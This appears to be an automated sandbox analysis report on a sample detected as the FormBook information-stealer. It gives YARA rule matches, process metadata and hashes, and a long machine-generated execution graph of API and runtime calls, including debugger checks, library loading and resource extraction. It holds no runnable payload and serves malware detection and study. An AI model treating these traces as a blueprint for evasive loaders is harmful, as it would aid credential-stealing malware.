                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:18:07:35
                                  Start date:12/07/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff6bf500000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:4.1%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:2.6%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:157
98061 fd8ff6 9 API calls _W_expandtime 98003->98061 98005 fd3633 98005->97924 98006->97926 98008 fb3b59 __ftell_nolock 98007->98008 98009 fb77c7 59 API calls 98008->98009 98010 fb3b63 GetCurrentDirectoryW 98009->98010 98062 fb3778 98010->98062 98012 fb3b8c IsDebuggerPresent 98013 fb3b9a 98012->98013 98014 fed4ad MessageBoxA 98012->98014 98015 fed4c7 98013->98015 98016 fb3bb7 98013->98016 98045 fb3c73 98013->98045 98014->98015 98262 fb7373 59 API calls Mailbox 98015->98262 98143 fb73e5 98016->98143 98017 fb3c7a SetCurrentDirectoryW 98020 fb3c87 Mailbox 98017->98020 98020->97928 98021 fed4d7 98026 fed4ed SetCurrentDirectoryW 98021->98026 98023 fb3bd5 GetFullPathNameW 98024 fb7d2c 59 API calls 98023->98024 98025 fb3c10 98024->98025 98159 fc0a8d 98025->98159 98026->98020 98029 fb3c2e 98045->98017 98059->97998 98060->98003 98061->98005 98063 fb77c7 59 API calls 98062->98063 98064 fb378e 98063->98064 98273 fb3d43 98064->98273 98066 fb37ac 98067 fb4864 61 API calls 98066->98067 98068 fb37c0 98067->98068 98069 fb7f41 59 API calls 98068->98069 98070 fb37cd 98069->98070 98287 fb4f3d 98070->98287 98073 fed3ae 98358 10197e5 98073->98358 98074 fb37ee Mailbox 98311 fb81a7 98074->98311 98078 fed3cd 98079 fd2f95 _free 58 API calls 98078->98079 98082 fed3da 98079->98082 98084 fb4faa 84 API calls 98082->98084 98086 fed3e3 98084->98086 98090 fb3ee2 59 API calls 98086->98090 98087 fb7f41 59 API calls 98088 fb381a 98087->98088 98318 fb8620 98088->98318 98092 fed3fe 98090->98092 98091 fb382c Mailbox 98093 fb7f41 59 API calls 98091->98093 98094 fb3ee2 59 API calls 98092->98094 98095 fb3852 98093->98095 98096 fed41a 98094->98096 98097 fb8620 69 API calls 98095->98097 98098 fb4864 61 API calls 98096->98098 98099 fb3861 Mailbox 98097->98099 98100 fed43f 98098->98100 98103 fb77c7 59 API calls 98099->98103 98101 fb3ee2 59 API calls 98100->98101 98102 fed44b 98101->98102 98104 fb81a7 59 API calls 98102->98104 98105 fb387f 98103->98105 98106 fed459 98104->98106 98322 fb3ee2 98105->98322 98108 
fb3ee2 59 API calls 98106->98108 98110 fed468 98108->98110 98116 fb81a7 59 API calls 98110->98116 98112 fb3899 98112->98086 98113 fb38a3 98112->98113 98114 fd313d _W_store_winword 60 API calls 98113->98114 98115 fb38ae 98114->98115 98115->98092 98117 fb38b8 98115->98117 98118 fed48a 98116->98118 98119 fd313d _W_store_winword 60 API calls 98117->98119 98120 fb3ee2 59 API calls 98118->98120 98121 fb38c3 98119->98121 98122 fed497 98120->98122 98121->98096 98123 fb38cd 98121->98123 98122->98122 98124 fd313d _W_store_winword 60 API calls 98123->98124 98125 fb38d8 98124->98125 98125->98110 98126 fb3919 98125->98126 98128 fb3ee2 59 API calls 98125->98128 98126->98110 98127 fb3926 98126->98127 98338 fb942e 98127->98338 98129 fb38fc 98128->98129 98131 fb81a7 59 API calls 98129->98131 98133 fb390a 98131->98133 98135 fb3ee2 59 API calls 98133->98135 98135->98126 98138 fb93ea 59 API calls 98140 fb3961 98138->98140 98139 fb9040 60 API calls 98139->98140 98140->98138 98140->98139 98141 fb3ee2 59 API calls 98140->98141 98142 fb39a7 Mailbox 98140->98142 98141->98140 98142->98012 98144 fb73f2 __ftell_nolock 98143->98144 98145 fb740b 98144->98145 98146 feee4b _memset 98144->98146 98147 fb48ae 60 API calls 98145->98147 98149 feee67 GetOpenFileNameW 98146->98149 98148 fb7414 98147->98148 99140 fd09d5 98148->99140 98151 feeeb6 98149->98151 98152 fb7d2c 59 API calls 98151->98152 98154 feeecb 98152->98154 98154->98154 98156 fb7429 99158 fb69ca 98156->99158 98160 fc0a9a __ftell_nolock 98159->98160 99469 fb6ee0 98160->99469 98162 fc0a9f 98163 fb3c26 98162->98163 99480 fc12fe 89 API calls 98162->99480 98163->98021 98163->98029 98262->98021 98274 fb3d50 __ftell_nolock 98273->98274 98275 fb7d2c 59 API calls 98274->98275 98286 fb3eb6 Mailbox 98274->98286 98277 fb3d82 98275->98277 98280 fb3db8 Mailbox 98277->98280 98399 fb7b52 98277->98399 98278 fb7b52 59 API calls 98278->98280 98279 fb3e89 98281 fb7f41 59 API calls 98279->98281 98279->98286 98280->98278 98280->98279 98282 fb7f41 59 API calls 
98280->98282 98285 fb3f84 59 API calls 98280->98285 98280->98286 98283 fb3eaa 98281->98283 98282->98280 98284 fb3f84 59 API calls 98283->98284 98284->98286 98285->98280 98286->98066 98402 fb4d13 98287->98402 98292 fedd0f 98295 fb4faa 84 API calls 98292->98295 98293 fb4f68 LoadLibraryExW 98412 fb4cc8 98293->98412 98296 fedd16 98295->98296 98298 fb4cc8 3 API calls 98296->98298 98300 fedd1e 98298->98300 98438 fb506b 98300->98438 98301 fb4f8f 98301->98300 98302 fb4f9b 98301->98302 98304 fb4faa 84 API calls 98302->98304 98306 fb37e6 98304->98306 98306->98073 98306->98074 98308 fedd45 98446 fb5027 98308->98446 98310 fedd52 98312 fb3801 98311->98312 98313 fb81b2 98311->98313 98315 fb93ea 98312->98315 98873 fb80d7 59 API calls 2 library calls 98313->98873 98316 fd0ff6 Mailbox 59 API calls 98315->98316 98317 fb380d 98316->98317 98317->98087 98319 fb862b 98318->98319 98320 fb8652 98319->98320 98874 fb8b13 69 API calls Mailbox 98319->98874 98320->98091 98323 fb3eec 98322->98323 98324 fb3f05 98322->98324 98325 fb81a7 59 API calls 98323->98325 98326 fb7d2c 59 API calls 98324->98326 98327 fb388b 98325->98327 98326->98327 98328 fd313d 98327->98328 98329 fd31be 98328->98329 98330 fd3149 98328->98330 98877 fd31d0 60 API calls 3 library calls 98329->98877 98337 fd316e 98330->98337 98875 fd8d68 58 API calls __getptd_noexit 98330->98875 98333 fd31cb 98333->98112 98334 fd3155 98876 fd8ff6 9 API calls _W_expandtime 98334->98876 98336 fd3160 98336->98112 98337->98112 98339 fb9436 98338->98339 98340 fd0ff6 Mailbox 59 API calls 98339->98340 98341 fb9444 98340->98341 98342 fb3936 98341->98342 98878 fb935c 59 API calls Mailbox 98341->98878 98344 fb91b0 98342->98344 98879 fb92c0 98344->98879 98346 fb91bf 98347 fd0ff6 Mailbox 59 API calls 98346->98347 98348 fb3944 98346->98348 98347->98348 98349 fb9040 98348->98349 98350 fef5a5 98349->98350 98352 fb9057 98349->98352 98350->98352 98889 fb8d3b 59 API calls Mailbox 98350->98889 98353 fb9158 98352->98353 98354 fb91a0 98352->98354 98357 fb915f 
98352->98357 98356 fd0ff6 Mailbox 59 API calls 98353->98356 98888 fb9e9c 60 API calls Mailbox 98354->98888 98356->98357 98357->98140 98359 fb5045 85 API calls 98358->98359 98360 1019854 98359->98360 98890 10199be 98360->98890 98363 fb506b 74 API calls 98364 1019881 98363->98364 98365 fb506b 74 API calls 98364->98365 98366 1019891 98365->98366 98367 fb506b 74 API calls 98366->98367 98368 10198ac 98367->98368 98369 fb506b 74 API calls 98368->98369 98370 10198c7 98369->98370 98371 fb5045 85 API calls 98370->98371 98372 10198de 98371->98372 98373 fd594c __crtLCMapStringA_stat 58 API calls 98372->98373 98374 10198e5 98373->98374 98375 fd594c __crtLCMapStringA_stat 58 API calls 98374->98375 98376 10198ef 98375->98376 98377 fb506b 74 API calls 98376->98377 98378 1019903 98377->98378 98379 1019393 GetSystemTimeAsFileTime 98378->98379 98380 1019916 98379->98380 98381 1019940 98380->98381 98382 101992b 98380->98382 98383 10199a5 98381->98383 98384 1019946 98381->98384 98385 fd2f95 _free 58 API calls 98382->98385 98387 fd2f95 _free 58 API calls 98383->98387 98896 1018d90 98384->98896 98388 1019931 98385->98388 98390 fed3c1 98387->98390 98391 fd2f95 _free 58 API calls 98388->98391 98390->98078 98393 fb4faa 98390->98393 98391->98390 98392 fd2f95 _free 58 API calls 98392->98390 98394 fb4fbb 98393->98394 98395 fb4fb4 98393->98395 98397 fb4fdb FreeLibrary 98394->98397 98398 fb4fca 98394->98398 98396 fd55d6 __fcloseall 83 API calls 98395->98396 98396->98394 98397->98398 98398->98078 98400 fb7faf 59 API calls 98399->98400 98401 fb7b5d 98400->98401 98401->98277 98451 fb4d61 98402->98451 98405 fb4d3a 98407 fb4d4a FreeLibrary 98405->98407 98408 fb4d53 98405->98408 98406 fb4d61 2 API calls 98406->98405 98407->98408 98409 fd548b 98408->98409 98455 fd54a0 98409->98455 98411 fb4f5c 98411->98292 98411->98293 98613 fb4d94 98412->98613 98415 fb4d94 2 API calls 98418 fb4ced 98415->98418 98416 fb4d08 98419 fb4dd0 98416->98419 98417 fb4cff FreeLibrary 98417->98416 98418->98416 98418->98417 98420 
fd0ff6 Mailbox 59 API calls 98419->98420 98421 fb4de5 98420->98421 98422 fb538e 59 API calls 98421->98422 98423 fb4df1 _memmove 98422->98423 98424 fb4e2c 98423->98424 98425 fb4ee9 98423->98425 98426 fb4f21 98423->98426 98427 fb5027 69 API calls 98424->98427 98617 fb4fe9 CreateStreamOnHGlobal 98425->98617 98628 1019ba5 95 API calls 98426->98628 98435 fb4e35 98427->98435 98430 fb506b 74 API calls 98430->98435 98432 fb4ec9 98432->98301 98433 fedcd0 98434 fb5045 85 API calls 98433->98434 98436 fedce4 98434->98436 98435->98430 98435->98432 98435->98433 98623 fb5045 98435->98623 98437 fb506b 74 API calls 98436->98437 98437->98432 98439 fb507d 98438->98439 98440 feddf6 98438->98440 98652 fd5812 98439->98652 98443 1019393 98850 10191e9 98443->98850 98445 10193a9 98445->98308 98447 feddb9 98446->98447 98448 fb5036 98446->98448 98855 fd5e90 98448->98855 98450 fb503e 98450->98310 98452 fb4d2e 98451->98452 98453 fb4d6a LoadLibraryA 98451->98453 98452->98405 98452->98406 98453->98452 98454 fb4d7b GetProcAddress 98453->98454 98454->98452 98458 fd54ac __alloc_osfhnd 98455->98458 98456 fd54bf 98504 fd8d68 58 API calls __getptd_noexit 98456->98504 98458->98456 98460 fd54f0 98458->98460 98459 fd54c4 98505 fd8ff6 9 API calls _W_expandtime 98459->98505 98474 fe0738 98460->98474 98463 fd54f5 98464 fd54fe 98463->98464 98465 fd550b 98463->98465 98506 fd8d68 58 API calls __getptd_noexit 98464->98506 98467 fd5535 98465->98467 98468 fd5515 98465->98468 98489 fe0857 98467->98489 98507 fd8d68 58 API calls __getptd_noexit 98468->98507 98471 fd54cf __alloc_osfhnd @_EH4_CallFilterFunc@8 98471->98411 98475 fe0744 __alloc_osfhnd 98474->98475 98476 fd9e4b __lock 58 API calls 98475->98476 98487 fe0752 98476->98487 98477 fe07c6 98509 fe084e 98477->98509 98478 fe07cd 98514 fd8a5d 58 API calls 2 library calls 98478->98514 98481 fe0843 __alloc_osfhnd 98481->98463 98482 fe07d4 98482->98477 98515 fda06b InitializeCriticalSectionAndSpinCount 98482->98515 98485 fd9ed3 __mtinitlocknum 58 API calls 
98485->98487 98486 fe07fa EnterCriticalSection 98486->98477 98487->98477 98487->98478 98487->98485 98512 fd6e8d 59 API calls __lock 98487->98512 98513 fd6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98487->98513 98498 fe0877 __wopenfile 98489->98498 98490 fe0891 98520 fd8d68 58 API calls __getptd_noexit 98490->98520 98491 fe0a4c 98491->98490 98496 fe0aaf 98491->98496 98493 fe0896 98521 fd8ff6 9 API calls _W_expandtime 98493->98521 98495 fd5540 98508 fd5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98495->98508 98517 fe87f1 98496->98517 98498->98490 98498->98491 98522 fd3a0b 60 API calls 2 library calls 98498->98522 98500 fe0a45 98500->98491 98523 fd3a0b 60 API calls 2 library calls 98500->98523 98502 fe0a64 98502->98491 98524 fd3a0b 60 API calls 2 library calls 98502->98524 98504->98459 98505->98471 98506->98471 98507->98471 98508->98471 98516 fd9fb5 LeaveCriticalSection 98509->98516 98511 fe0855 98511->98481 98512->98487 98513->98487 98514->98482 98515->98486 98516->98511 98525 fe7fd5 98517->98525 98519 fe880a 98519->98495 98520->98493 98521->98495 98522->98500 98523->98502 98524->98491 98527 fe7fe1 __alloc_osfhnd 98525->98527 98526 fe7ff7 98610 fd8d68 58 API calls __getptd_noexit 98526->98610 98527->98526 98529 fe802d 98527->98529 98536 fe809e 98529->98536 98530 fe7ffc 98611 fd8ff6 9 API calls _W_expandtime 98530->98611 98533 fe8049 98612 fe8072 LeaveCriticalSection __unlock_fhandle 98533->98612 98535 fe8006 __alloc_osfhnd 98535->98519 98537 fe80be 98536->98537 98538 fd471a __wsopen_nolock 58 API calls 98537->98538 98540 fe80da 98538->98540 98539 fd9006 __invoke_watson 8 API calls 98541 fe87f0 98539->98541 98542 fe8114 98540->98542 98550 fe8137 98540->98550 98584 fe8211 98540->98584 98543 fe7fd5 __wsopen_helper 103 API calls 98541->98543 98544 fd8d34 __chsize_nolock 58 API calls 98542->98544 98545 fe880a 98543->98545 98546 fe8119 98544->98546 98545->98533 98547 fd8d68 _W_expandtime 58 API calls 98546->98547 98548 fe8126 98547->98548 98551 
fd8ff6 _W_expandtime 9 API calls 98548->98551 98549 fe81f5 98552 fd8d34 __chsize_nolock 58 API calls 98549->98552 98550->98549 98556 fe81d3 98550->98556 98577 fe8130 98551->98577 98553 fe81fa 98552->98553 98554 fd8d68 _W_expandtime 58 API calls 98553->98554 98555 fe8207 98554->98555 98557 fd8ff6 _W_expandtime 9 API calls 98555->98557 98558 fdd4d4 __alloc_osfhnd 61 API calls 98556->98558 98557->98584 98559 fe82a1 98558->98559 98560 fe82ce 98559->98560 98561 fe82ab 98559->98561 98563 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98560->98563 98562 fd8d34 __chsize_nolock 58 API calls 98561->98562 98564 fe82b0 98562->98564 98571 fe82f0 98563->98571 98565 fd8d68 _W_expandtime 58 API calls 98564->98565 98567 fe82ba 98565->98567 98566 fe836e GetFileType 98568 fe83bb 98566->98568 98569 fe8379 GetLastError 98566->98569 98573 fd8d68 _W_expandtime 58 API calls 98567->98573 98580 fdd76a __set_osfhnd 59 API calls 98568->98580 98574 fd8d47 __dosmaperr 58 API calls 98569->98574 98570 fe833c GetLastError 98572 fd8d47 __dosmaperr 58 API calls 98570->98572 98571->98566 98571->98570 98575 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98571->98575 98576 fe8361 98572->98576 98573->98577 98578 fe83a0 CloseHandle 98574->98578 98579 fe8331 98575->98579 98582 fd8d68 _W_expandtime 58 API calls 98576->98582 98577->98533 98578->98576 98581 fe83ae 98578->98581 98579->98566 98579->98570 98587 fe83d9 98580->98587 98583 fd8d68 _W_expandtime 58 API calls 98581->98583 98582->98584 98585 fe83b3 98583->98585 98584->98539 98585->98576 98586 fe8594 98586->98584 98589 fe8767 CloseHandle 98586->98589 98587->98586 98588 fe1b11 __lseeki64_nolock 60 API calls 98587->98588 98606 fe845a 98587->98606 98590 fe8443 98588->98590 98591 fe7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98589->98591 98594 fd8d34 __chsize_nolock 58 API calls 98590->98594 98590->98606 98593 fe878e 98591->98593 98592 fe10ab 70 API calls __read_nolock 98592->98606 98595 fe87c2 
98593->98595 98596 fe8796 GetLastError 98593->98596 98594->98606 98595->98584 98597 fd8d47 __dosmaperr 58 API calls 98596->98597 98600 fe87a2 98597->98600 98598 fe0d2d __close_nolock 61 API calls 98598->98606 98599 fe848c 98601 fe99f2 __chsize_nolock 82 API calls 98599->98601 98599->98606 98602 fdd67d __free_osfhnd 59 API calls 98600->98602 98601->98599 98602->98595 98603 fddac6 __write 78 API calls 98603->98606 98604 fe8611 98605 fe0d2d __close_nolock 61 API calls 98604->98605 98607 fe8618 98605->98607 98606->98586 98606->98592 98606->98598 98606->98599 98606->98603 98606->98604 98608 fe1b11 60 API calls __lseeki64_nolock 98606->98608 98609 fd8d68 _W_expandtime 58 API calls 98607->98609 98608->98606 98609->98584 98610->98530 98611->98535 98612->98535 98614 fb4ce1 98613->98614 98615 fb4d9d LoadLibraryA 98613->98615 98614->98415 98614->98418 98615->98614 98616 fb4dae GetProcAddress 98615->98616 98616->98614 98618 fb5003 FindResourceExW 98617->98618 98622 fb5020 98617->98622 98619 fedd5c LoadResource 98618->98619 98618->98622 98620 fedd71 SizeofResource 98619->98620 98619->98622 98621 fedd85 LockResource 98620->98621 98620->98622 98621->98622 98622->98424 98624 fb5054 98623->98624 98627 feddd4 98623->98627 98629 fd5a7d 98624->98629 98626 fb5062 98626->98435 98628->98424 98630 fd5a89 __alloc_osfhnd 98629->98630 98631 fd5a9b 98630->98631 98633 fd5ac1 98630->98633 98642 fd8d68 58 API calls __getptd_noexit 98631->98642 98644 fd6e4e 98633->98644 98635 fd5aa0 98643 fd8ff6 9 API calls _W_expandtime 98635->98643 98636 fd5ac7 98650 fd59ee 83 API calls 5 library calls 98636->98650 98639 fd5ad6 98651 fd5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98639->98651 98641 fd5aab __alloc_osfhnd 98641->98626 98642->98635 98643->98641 98645 fd6e5e 98644->98645 98646 fd6e80 EnterCriticalSection 98644->98646 98645->98646 98647 fd6e66 98645->98647 98648 fd6e76 98646->98648 98649 fd9e4b __lock 58 API calls 98647->98649 98648->98636 98649->98648 98650->98639 98651->98641 98655 
fd582d 98652->98655 98654 fb508e 98654->98443 98656 fd5839 __alloc_osfhnd 98655->98656 98657 fd587c 98656->98657 98658 fd584f _memset 98656->98658 98659 fd5874 __alloc_osfhnd 98656->98659 98660 fd6e4e __lock_file 59 API calls 98657->98660 98682 fd8d68 58 API calls __getptd_noexit 98658->98682 98659->98654 98662 fd5882 98660->98662 98668 fd564d 98662->98668 98663 fd5869 98683 fd8ff6 9 API calls _W_expandtime 98663->98683 98669 fd5683 98668->98669 98671 fd5668 _memset 98668->98671 98684 fd58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98669->98684 98670 fd5673 98780 fd8d68 58 API calls __getptd_noexit 98670->98780 98671->98669 98671->98670 98676 fd56c3 98671->98676 98673 fd5678 98781 fd8ff6 9 API calls _W_expandtime 98673->98781 98676->98669 98677 fd57d4 _memset 98676->98677 98685 fd4916 98676->98685 98692 fe10ab 98676->98692 98760 fe0df7 98676->98760 98782 fe0f18 58 API calls 3 library calls 98676->98782 98783 fd8d68 58 API calls __getptd_noexit 98677->98783 98682->98663 98683->98659 98684->98659 98686 fd4935 98685->98686 98687 fd4920 98685->98687 98686->98676 98784 fd8d68 58 API calls __getptd_noexit 98687->98784 98689 fd4925 98785 fd8ff6 9 API calls _W_expandtime 98689->98785 98691 fd4930 98691->98676 98693 fe10cc 98692->98693 98694 fe10e3 98692->98694 98795 fd8d34 58 API calls __getptd_noexit 98693->98795 98696 fe181b 98694->98696 98700 fe111d 98694->98700 98811 fd8d34 58 API calls __getptd_noexit 98696->98811 98697 fe10d1 98796 fd8d68 58 API calls __getptd_noexit 98697->98796 98703 fe1125 98700->98703 98709 fe113c 98700->98709 98701 fe1820 98812 fd8d68 58 API calls __getptd_noexit 98701->98812 98797 fd8d34 58 API calls __getptd_noexit 98703->98797 98704 fe1131 98813 fd8ff6 9 API calls _W_expandtime 98704->98813 98705 fe10d8 98705->98676 98707 fe112a 98798 fd8d68 58 API calls __getptd_noexit 98707->98798 98709->98705 98710 fe1151 98709->98710 98712 fe116b 98709->98712 98714 fe1189 98709->98714 98799 fd8d34 58 API calls __getptd_noexit 98710->98799 
98712->98710 98718 fe1176 98712->98718 98800 fd8a5d 58 API calls 2 library calls 98714->98800 98716 fe1199 98719 fe11bc 98716->98719 98720 fe11a1 98716->98720 98786 fe5ebb 98718->98786 98803 fe1b11 60 API calls 3 library calls 98719->98803 98801 fd8d68 58 API calls __getptd_noexit 98720->98801 98721 fe128a 98723 fe1303 ReadFile 98721->98723 98728 fe12a0 GetConsoleMode 98721->98728 98726 fe1325 98723->98726 98727 fe17e3 GetLastError 98723->98727 98725 fe11a6 98802 fd8d34 58 API calls __getptd_noexit 98725->98802 98726->98727 98734 fe12f5 98726->98734 98730 fe12e3 98727->98730 98731 fe17f0 98727->98731 98732 fe12b4 98728->98732 98733 fe1300 98728->98733 98742 fe12e9 98730->98742 98804 fd8d47 58 API calls 3 library calls 98730->98804 98809 fd8d68 58 API calls __getptd_noexit 98731->98809 98732->98733 98736 fe12ba ReadConsoleW 98732->98736 98733->98723 98734->98742 98744 fe135a 98734->98744 98747 fe15c7 98734->98747 98736->98734 98738 fe12dd GetLastError 98736->98738 98737 fe17f5 98810 fd8d34 58 API calls __getptd_noexit 98737->98810 98738->98730 98741 fd2f95 _free 58 API calls 98741->98705 98742->98705 98742->98741 98745 fe13c6 ReadFile 98744->98745 98751 fe1447 98744->98751 98748 fe13e7 GetLastError 98745->98748 98758 fe13f1 98745->98758 98746 fe16cd ReadFile 98753 fe16f0 GetLastError 98746->98753 98759 fe16fe 98746->98759 98747->98742 98747->98746 98748->98758 98749 fe1504 98754 fe14b4 MultiByteToWideChar 98749->98754 98807 fe1b11 60 API calls 3 library calls 98749->98807 98750 fe14f4 98806 fd8d68 58 API calls __getptd_noexit 98750->98806 98751->98742 98751->98749 98751->98750 98751->98754 98753->98759 98754->98738 98754->98742 98758->98744 98805 fe1b11 60 API calls 3 library calls 98758->98805 98759->98747 98808 fe1b11 60 API calls 3 library calls 98759->98808 98761 fe0e02 98760->98761 98764 fe0e17 98760->98764 98847 fd8d68 58 API calls __getptd_noexit 98761->98847 98763 fe0e07 98848 fd8ff6 9 API calls _W_expandtime 98763->98848 98766 fe0e4c 98764->98766 98772 
fe0e12 98764->98772 98849 fe6234 58 API calls __malloc_crt 98764->98849 98768 fd4916 __fputwc_nolock 58 API calls 98766->98768 98769 fe0e60 98768->98769 98814 fe0f97 98769->98814 98771 fe0e67 98771->98772 98773 fd4916 __fputwc_nolock 58 API calls 98771->98773 98772->98676 98774 fe0e8a 98773->98774 98774->98772 98775 fd4916 __fputwc_nolock 58 API calls 98774->98775 98776 fe0e96 98775->98776 98776->98772 98777 fd4916 __fputwc_nolock 58 API calls 98776->98777 98778 fe0ea3 98777->98778 98779 fd4916 __fputwc_nolock 58 API calls 98778->98779 98779->98772 98780->98673 98781->98669 98782->98676 98783->98673 98784->98689 98785->98691 98787 fe5ec6 98786->98787 98788 fe5ed3 98786->98788 98789 fd8d68 _W_expandtime 58 API calls 98787->98789 98791 fe5edf 98788->98791 98792 fd8d68 _W_expandtime 58 API calls 98788->98792 98790 fe5ecb 98789->98790 98790->98721 98791->98721 98793 fe5f00 98792->98793 98794 fd8ff6 _W_expandtime 9 API calls 98793->98794 98794->98790 98795->98697 98796->98705 98797->98707 98798->98704 98799->98707 98800->98716 98801->98725 98802->98705 98803->98718 98804->98742 98805->98758 98806->98742 98807->98754 98808->98759 98809->98737 98810->98742 98811->98701 98812->98704 98813->98705 98815 fe0fa3 __alloc_osfhnd 98814->98815 98816 fe0fc7 98815->98816 98817 fe0fb0 98815->98817 98818 fe108b 98816->98818 98820 fe0fdb 98816->98820 98819 fd8d34 __chsize_nolock 58 API calls 98817->98819 98821 fd8d34 __chsize_nolock 58 API calls 98818->98821 98822 fe0fb5 98819->98822 98824 fe0ff9 98820->98824 98825 fe1006 98820->98825 98826 fe0ffe 98821->98826 98823 fd8d68 _W_expandtime 58 API calls 98822->98823 98838 fe0fbc __alloc_osfhnd 98823->98838 98827 fd8d34 __chsize_nolock 58 API calls 98824->98827 98828 fe1028 98825->98828 98829 fe1013 98825->98829 98830 fd8d68 _W_expandtime 58 API calls 98826->98830 98827->98826 98832 fdd446 ___lock_fhandle 59 API calls 98828->98832 98831 fd8d34 __chsize_nolock 58 API calls 98829->98831 98834 fe1020 98830->98834 98835 fe1018 98831->98835 
98833 fe102e 98832->98833 98836 fe1054 98833->98836 98837 fe1041 98833->98837 98841 fd8ff6 _W_expandtime 9 API calls 98834->98841 98839 fd8d68 _W_expandtime 58 API calls 98835->98839 98842 fd8d68 _W_expandtime 58 API calls 98836->98842 98840 fe10ab __read_nolock 70 API calls 98837->98840 98838->98771 98839->98834 98843 fe104d 98840->98843 98841->98838 98844 fe1059 98842->98844 98846 fe1083 __read LeaveCriticalSection 98843->98846 98845 fd8d34 __chsize_nolock 58 API calls 98844->98845 98845->98843 98846->98838 98847->98763 98848->98772 98849->98766 98853 fd543a GetSystemTimeAsFileTime 98850->98853 98852 10191f8 98852->98445 98854 fd5468 __aulldiv 98853->98854 98854->98852 98856 fd5e9c __alloc_osfhnd 98855->98856 98857 fd5eae 98856->98857 98858 fd5ec3 98856->98858 98869 fd8d68 58 API calls __getptd_noexit 98857->98869 98860 fd6e4e __lock_file 59 API calls 98858->98860 98862 fd5ec9 98860->98862 98861 fd5eb3 98870 fd8ff6 9 API calls _W_expandtime 98861->98870 98871 fd5b00 67 API calls 5 library calls 98862->98871 98865 fd5ed4 98872 fd5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98865->98872 98866 fd5ebe __alloc_osfhnd 98866->98450 98868 fd5ee6 98868->98866 98869->98861 98870->98866 98871->98865 98872->98868 98873->98312 98874->98320 98875->98334 98876->98336 98877->98333 98878->98342 98880 fb92c9 Mailbox 98879->98880 98881 fef5c8 98880->98881 98886 fb92d3 98880->98886 98882 fd0ff6 Mailbox 59 API calls 98881->98882 98884 fef5d4 98882->98884 98883 fb92da 98883->98346 98886->98883 98887 fb9df0 59 API calls Mailbox 98886->98887 98887->98886 98888->98357 98889->98352 98895 10199d2 __tzset_nolock _wcscmp 98890->98895 98891 1019866 98891->98363 98891->98390 98892 fb506b 74 API calls 98892->98895 98893 1019393 GetSystemTimeAsFileTime 98893->98895 98894 fb5045 85 API calls 98894->98895 98895->98891 98895->98892 98895->98893 98895->98894 98897 1018d9b 98896->98897 98898 1018da9 98896->98898 98899 fd548b 115 API calls 98897->98899 98900 1018dee 98898->98900 98901 
fd548b 115 API calls 98898->98901 98926 1018db2 98898->98926 98899->98898 98927 101901b 98900->98927 98903 1018dd3 98901->98903 98903->98900 98905 1018ddc 98903->98905 98904 1018e32 98906 1018e57 98904->98906 98907 1018e36 98904->98907 98908 fd55d6 __fcloseall 83 API calls 98905->98908 98905->98926 98931 1018c33 98906->98931 98911 fd55d6 __fcloseall 83 API calls 98907->98911 98912 1018e43 98907->98912 98908->98926 98911->98912 98915 fd55d6 __fcloseall 83 API calls 98912->98915 98912->98926 98913 1018e85 98940 1018eb5 98913->98940 98914 1018e65 98916 1018e72 98914->98916 98918 fd55d6 __fcloseall 83 API calls 98914->98918 98915->98926 98920 fd55d6 __fcloseall 83 API calls 98916->98920 98916->98926 98918->98916 98920->98926 98923 1018ea0 98925 fd55d6 __fcloseall 83 API calls 98923->98925 98923->98926 98925->98926 98926->98392 98928 1019040 98927->98928 98930 1019029 __tzset_nolock _memmove 98927->98930 98929 fd5812 __fread_nolock 74 API calls 98928->98929 98929->98930 98930->98904 98932 fd594c __crtLCMapStringA_stat 58 API calls 98931->98932 98933 1018c42 98932->98933 98934 fd594c __crtLCMapStringA_stat 58 API calls 98933->98934 98935 1018c56 98934->98935 98936 fd594c __crtLCMapStringA_stat 58 API calls 98935->98936 98937 1018c6a 98936->98937 98938 1018f97 58 API calls 98937->98938 98939 1018c7d 98937->98939 98938->98939 98939->98913 98939->98914 98947 1018eca 98940->98947 98941 1018f82 98969 10191bf 98941->98969 98943 1018c8f 74 API calls 98943->98947 98944 1018e8c 98948 1018f97 98944->98948 98947->98941 98947->98943 98947->98944 98973 1018d2b 74 API calls 98947->98973 98974 101909c 80 API calls 98947->98974 98949 1018fa4 98948->98949 98950 1018faa 98948->98950 98952 fd2f95 _free 58 API calls 98949->98952 98951 1018fbb 98950->98951 98953 fd2f95 _free 58 API calls 98950->98953 98954 1018e93 98951->98954 98955 fd2f95 _free 58 API calls 98951->98955 98952->98950 98953->98951 98954->98923 98956 fd55d6 98954->98956 98955->98954 98957 fd55e2 __alloc_osfhnd 98956->98957 
